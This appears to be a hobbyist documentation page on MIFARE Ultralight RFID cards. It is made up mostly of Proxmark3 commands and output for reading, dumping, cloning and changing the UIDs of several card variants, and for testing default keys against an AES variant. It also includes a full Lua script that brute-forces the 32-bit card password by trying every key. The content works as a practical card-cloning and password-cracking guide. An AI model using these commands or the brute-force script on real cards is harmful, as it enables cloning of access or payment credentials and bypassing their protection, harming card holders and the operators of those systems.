MIFARE Ultralight - Documentation

Link to this headingMIFARE Ultralight

Operates at 13.56 MHz
Uses the ISO/IEC 14443-3 protocols
optional password but is transmitted in clear text

Link to this headingMIFARE Ultralight Gen1A

Password Authentication

Read a Ultralight:

[usb] pm3 --> hf mfu info [=] --- Tag Information -------------------------- [+] TYPE: MIFARE Ultralight (MF0ICU1) [+] UID: 04 B7 66 DA A5 4F 80 [+] UID[0]: 04, NXP Semiconductors Germany [+] BCC0: 5D ( ok ) [+] BCC1: B0 ( ok ) [+] Internal: 48 ( default ) [+] Lock: 00 00 - 0000000000000000 [+] OneTimePad: 00 00 00 00 - 00000000000000000000000000000000 [=] ------------------------ Fingerprint ----------------------- [=] Reading tag memory... [=] ------------------------------------------------------------

Dump Memory:

[usb] pm3 --> hf mfu dump [+] TYPE: MIFARE Ultralight (MF0ICU1) [+] Reading tag memory... [=] MFU dump file information [=] ------------------------------------------------------------- [=] Version..... 00 00 00 00 00 00 00 00 [=] TBD 0....... 00 00 [=] TBD 1....... 00 [=] Signature... 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [=] 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [=] Counter 0... 00 00 00 [=] Tearing 0... 00 [=] Counter 1... 00 00 00 [=] Tearing 1... 00 [=] Counter 2... 00 00 00 [=] Tearing 2... 00 [=] Max data page... 14 ( 60 bytes ) [=] Header size..... 56 bytes [=] ------------------------------------------------------------- [=] block# | data |lck| ascii [=] ---------+-------------+---+------ [=] 0/0x00 | 04 47 0E C5 | | .G.. [=] 1/0x01 | 0A F1 33 84 | | ..3. [=] 2/0x02 | 4C 48 F8 01 | | LH.. [=] 3/0x03 | F4 1B 48 15 | 1 | ..H. [=] 4/0x04 | 54 30 35 33 | 1 | T053 [=] 5/0x05 | 37 30 32 30 | 1 | 7020 [=] 6/0x06 | 33 39 32 30 | 1 | 3920 [=] 7/0x07 | 30 31 38 32 | 1 | 0182 [=] 8/0x08 | 32 38 31 39 | 1 | 2819 [=] 9/0x09 | FF FF FF FF | 0 | .... [=] 10/0x0A | FF FF FF FF | 0 | .... [=] 11/0x0B | FF FF FF FF | 0 | .... [=] 12/0x0C | FF FF FF FF | 0 | .... [=] 13/0x0D | FF FF FF FF | 0 | .... [=] 14/0x0E | FF FF FF FF | 0 | .... [=] 15/0x0F | FF FF FF FF | 0 | .... [=] --------------------------------- [=] Using UID as filename [+] saved 120 bytes to binary file D:\V0.2.8-win64\rrg_other-20240116-989ef99e4a65424f77721540eb227cb8e86403dd\client\/hf-mfu-04470E0AF13384-dump-001.bin [+] saved to json file D:\V0.2.8-win64\rrg_other-20240116-989ef99e4a65424f77721540eb227cb8e86403dd\client\/hf-mfu-04470E0AF13384-dump-001.json

Clone Card:

[usb] pm3 --> hf mfu restore -f hf-mfu-04470E0AF13384-dump-001.bin [+] loaded 120 bytes from binary file `hf-mfu-04470E0AF13384-dump-001.bin` [=] Restoring hf-mfu-04470E0AF13384-dump-001.bin to card

Brute force Script:

local getopt = require('getopt') local utils = require('utils') function file_exists(name) local f = io.open(name, "r") return f ~= nil and io.close(f) end local function convert_string_to_hex(str) return ( str:gsub('.', function (c) return string.format('%02X', string.byte(c)) end ) ) end -- Convert a string in to a hex string local function convert_int_to_hex(int) return ( string.format("%x", int) ) end local function main(args) start_id = 0x00000000 end_id = 0xFFFFFFFF for option, argument in getopt.getopt(args, ':s:e') do -- start hex value if option == 's' then print('Start Key ' .. argument) start_id = tonumber(argument, 16) end -- end hex value if option == 'e' then end_id = tonumber(argument, 16) end end print('Starting bruteforce from key 0x' .. ('%08x'):format(start_id) .. ' to dump the data') for i = start_id,end_id,1 do print('Trying key ' .. ('%08x'):format(i)) --print('hf mfu dump -k ' .. ('%08x'):format(i) .. ' -f decrypted_' .. ('%08x'):format(i) .. '.bin') core.console('hf mfu dump -k ' .. ('%08x'):format(i) .. ' -f decrypted_' .. ('%08x'):format(i) .. '.bin') if file_exists('decrypted_' .. ('%08x'):format(i) .. '.bin') then print('Found key ' .. ('%08x'):format(i)) return true end end end main(args)

Link to this headingMIFARE Ultralight DirectWrite

Link to this headingMIFARE Ultralight EV1 DirectWrite

Link to this headingMIFARE Ultralight EV1 Magic Card

Change UID:

[usb] pm3 --> hf mfu setuid -u 01020304050607 [=] Please ignore possible transient BCC warnings [usb] pm3 --> hf mfu info [=] --- Tag Information -------------------------- [+] TYPE: MIFARE Ultralight EV1 48bytes (MF0UL1101) ( magic ) [+] UID: 01 02 03 04 05 06 07 [+] UID[0]: 01, Motorola UK [+] BCC0: 88 ( ok ) [+] BCC1: 00 ( ok ) [+] Internal: 00 ( not default ) [+] Lock: 00 00 - 0000000000000000 [+] OneTimePad: 00 00 00 00 - 00000000000000000000000000000000

Link to this headingMIFARE Ultralight EV1

Card Info:

[usb] pm3 --> hf mfu info [=] --- Tag Information -------------------------- [+] TYPE: MIFARE Ultralight EV1 48bytes (MF0UL1101) [+] UID: 04 46 DF CA 5B 62 80 [+] UID[0]: 04, NXP Semiconductors Germany [+] BCC0: 15 ( ok ) [+] BCC1: 73 ( ok ) [+] Internal: 48 ( default ) [+] Lock: 00 00 - 0000000000000000 [+] OneTimePad: 00 00 00 00 - 00000000000000000000000000000000 [=] --- Tag Counters [=] [0]: 00 00 00 [+] - BD tearing ( ok ) [=] [1]: 00 00 00 [+] - BD tearing ( ok ) [=] [2]: 00 00 00 [+] - BD tearing ( ok ) [=] --- Tag Silicon Information [=] Wafer Counter: 17582969 ( 0x10C4B79 ) [=] Wafer Coordinates: x 70, y 223 (0x46, 0xDF) [=] Test Site: 2 [=] --- Tag Version [=] Raw bytes: 00 04 03 01 01 00 0B 03 [=] Vendor ID: 04, NXP Semiconductors Germany [=] Product type: Ultralight [=] Product subtype: 01, 17 pF [=] Major version: 01 [=] Minor version: 00 [=] Size: 0B, (64 <-> 32 bytes) [=] Protocol type: 03, ISO14443-3 Compliant [=] --- Tag Configuration [=] cfg0 [16/0x10]: 00 00 00 FF [=] - strong modulation mode disabled [=] - pages don't need authentication [=] cfg1 [17/0x11]: 00 05 00 00 [=] - Unlimited password attempts [=] - NFC counter disabled [=] - NFC counter not protected [=] - user configuration writeable [=] - write access is protected with password [=] - 05, Virtual Card Type Identifier is default [=] PWD [18/0x12]: 00 00 00 00 - (cannot be read) [=] PACK [19/0x13]: 00 00 - (cannot be read) [=] RFU [19/0x13]: 00 00 - (cannot be read) [+] --- Known EV1/NTAG passwords [+] Found default password FF FF FF FF pack 00 00 [=] ------------------------ Fingerprint ----------------------- [=] Reading tag memory... [=] ------------------------------------------------------------

Read Memory:

[usb] pm3 --> hf mfu dump -k "FFFFFFFF" [+] TYPE: MIFARE Ultralight EV1 48bytes (MF0UL1101) [+] Reading tag memory... [=] MFU dump file information [=] ------------------------------------------------------------- [=] Version..... 00 04 03 01 01 00 0B 03 [=] TBD 0....... 00 00 [=] TBD 1....... 00 [=] Signature... 21 46 AA 5B B9 7E D9 BF E2 5B E2 9D 56 E0 AF C3 [=] 7F 43 DB 50 8B B2 3C 9E 69 70 21 EC A3 E9 56 B1 [=] Counter 0... 00 00 00 [=] Tearing 0... BD [=] Counter 1... 00 00 00 [=] Tearing 1... BD [=] Counter 2... 00 00 00 [=] Tearing 2... BD [=] Max data page... 18 ( 76 bytes ) [=] Header size..... 56 bytes [=] ------------------------------------------------------------- [=] block# | data |lck| ascii [=] ---------+-------------+---+------ [=] 0/0x00 | 04 46 DF 15 | | .F.. [=] 1/0x01 | CA 5B 62 80 | | .[b. [=] 2/0x02 | 73 48 00 00 | | sH.. [=] 3/0x03 | 00 00 00 00 | 0 | .... [=] 4/0x04 | 00 00 00 00 | 0 | .... [=] 5/0x05 | 00 00 00 00 | 0 | .... [=] 6/0x06 | 00 00 00 00 | 0 | .... [=] 7/0x07 | 00 00 00 00 | 0 | .... [=] 8/0x08 | 00 00 00 00 | 0 | .... [=] 9/0x09 | 00 00 00 00 | 0 | .... [=] 10/0x0A | 00 00 00 00 | 0 | .... [=] 11/0x0B | 00 00 00 00 | 0 | .... [=] 12/0x0C | 00 00 00 00 | 0 | .... [=] 13/0x0D | 00 00 00 00 | 0 | .... [=] 14/0x0E | 00 00 00 00 | 0 | .... [=] 15/0x0F | 00 00 00 00 | 0 | .... [=] 16/0x10 | 00 00 00 FF | 0 | .... [=] 17/0x11 | 00 05 00 00 | 0 | .... [=] 18/0x12 | FF FF FF FF | 0 | .... [=] 19/0x13 | 00 00 00 00 | 0 | .... [=] ---------------------------------

Link to this headingMonotonic Counter Anti-Tearing Defeated

Anti-Tearing: Is a feature on RFIDs that only when the card has enough power to preform a write will it actually write to the card.

Source

Link to this headingMIFARE Ultralight AES

Read Card:

usb] pm3 --> hf mfu info [=] --- Tag Information -------------------------- [+] TYPE: MIFARE Ultralight AES [+] UID: 04 D1 45 EA 6F 1F 90 [+] UID[0]: 04, NXP Semiconductors Germany [+] BCC0: 18 ( ok ) [+] BCC1: 0A ( ok ) [+] Internal: 48 ( default ) [+] Lock: 0F 00 - 0000111100000000 [+] OTP: 9D 55 EC 1A - 10011101010101011110110000011010 [=] --- Tag Silicon Information [=] Wafer Counter: 19131901 ( 0x123EDFD ) [=] Wafer Coordinates: x 209, y 69 (0xD1, 0x45) [=] Test Site: 2 [=] --- Tag Counters [=] IC signature public key name: NXP Ultralight AES (alt key) [=] IC signature public key value: 04DC34DAA903F2726A6225B11C692AF6 [=] : AB4396575CA12810CBBCE3F781A097B3 [=] : 833B50AB364A70D9C2B641A728A599AE [=] : 74 [=] Elliptic curve parameters: secp192r1 [=] TAG IC Signature: C853ACB7D96E636E60AD0A3A3940B2DD [=] : 90AD6ADC4CDDE84BC969BECD0C091A11 [=] : 174A8FA3AFF02258EA21FF9C436CDB15 [+] Signature verification: successful [=] --- Tag Version [=] Raw bytes: 0004030104000F03 [=] Vendor ID: 04, NXP Semiconductors Germany [=] Product type: Ultralight [=] Product subtype: 01, 17 pF [=] Major version: 04 [=] Minor version: 00 [=] Size: 0F, (256 - 128 bytes) [=] Protocol type: 03, ISO14443-3 Compliant [!] ⚠️ Warning: block 0x29 cannot be read [+] --- Known UL-AES keys [=] n/a [=] [=] --- Fingerprint [=] n/a [=] Tag appears to be locked, try using a key to get more info [?] Hint: Try `hf mfu pwdgen -r` to get see known pwd gen algo suggestions

Try Keys:

[usb] pm3 --> hf mfu aeschk -f /home/generalzero/Downloads/proxmark3/client/dictionaries/mfulc_default_keys.dic [+] Loaded 7 keys from dictionary file `/home/generalzero/Downloads/proxmark3/client/dictionaries/mfulc_default_keys.dic` 🕒 Testing 0/ 7 ( 0.0 % ) [=] Time spent 0.1s [=] Authentication attempts: 7 [=] Speed: 66.0 auths/s

Link to this headingMIFARE Ultralight Magic

Write Blocks:

[usb] pm3 --> hf mfu setuid --uid 01020304050607 [=] Please ignore possible transient BCC warnings [usb] pm3 --> hf mfu info [=] --- Tag Information -------------------------- [+] TYPE: Unknown 000000 [+] UID: 01 02 03 04 05 06 07 [+] UID[0]: 01, Motorola UK [+] BCC0: 88 ( ok ) [+] BCC1: 00 ( ok ) [+] Internal: 00 ( not default ) [+] Lock: 00 00 - 0000000000000000 [+] OneTimePad: 00 00 00 00 - 00000000000000000000000000000000 [=] ------------------------ Fingerprint ----------------------- [=] Reading tag memory... [=] ------------------------------------------------------------